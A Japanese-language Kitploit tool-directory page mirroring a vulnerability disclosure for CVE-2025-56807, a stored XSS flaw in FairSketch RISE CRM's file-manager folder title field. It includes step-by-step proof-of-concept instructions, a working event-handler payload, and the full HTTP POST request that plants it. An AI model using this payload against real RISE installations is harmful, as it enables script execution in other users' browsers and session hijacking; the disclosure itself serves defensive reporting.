Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-56807 — CVE-2025-56807: 保存型クロスサイトスクリプティング(XSS)の脆弱性が、FairSketch RISE Ultimate Project Manager & CRM(v3.9.4)のファイルマネージャー機能で発見されました。 | Kitploit
ツール/GitHubGitHub/aqwainfosec/cve-2025-56807
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

CVE-2025-56807: 保存型クロスサイトスクリプティング(XSS)の脆弱性が、FairSketch RISE Ultimate Project Manager & CRM(v3.9.4)のファイルマネージャー機能で発見されました。

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-56807

説明

FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) のファイルマネージャー機能に、格納型クロスサイトスクリプティング (XSS) の脆弱性が発見されました。この脆弱性は、新しいフォルダーを作成する際に送信される titleパラメーター に存在します。入力サニタイズが不十分なため、攻撃者は HTML/JavaScriptペイロード (例: <details/open/ontoggle=prompt(origin)>) を注入できます。ペイロードはフォルダー名に保存され、ファイルマネージャーでフォルダーを一覧表示する際に実行されるため、影響を受けるフォルダーを表示したユーザーのブラウザー上で任意のJavaScriptが実行される可能性があります。これにより、セッションハイジャックやデータの外部送信が発生する恐れがあります。

[!NOTE]
この脆弱性は管理者アカウントに限定されるものではありません。ファイルマネージャーで新しいフォルダーを作成する権限を持つ任意のユーザーアカウントを使用して悪用できます。

開示スケジュール

  • CVE ID採番: CVE-2025-56807
  • 発見: 2025年7月 (Aqwa Hameed 氏による)
  • ベンダー通知: Fairsketchサポートに電子メールで連絡
  • 対応: 2025年7月22日にベンダーが確認

概念実証 (PoC)

  1. 有効な認証情報でログインします。

  2. Files に移動します。

    Dashboard

  3. New Folder をクリックします。

    File Manager

  4. Title フィールドに以下のペイロードを入力します:

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

Folder Title

  1. ファイルマネージャーのページを再読み込みしてペイロードを実行します。

    Payload Execution

リクエスト

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
ツールをダウンロード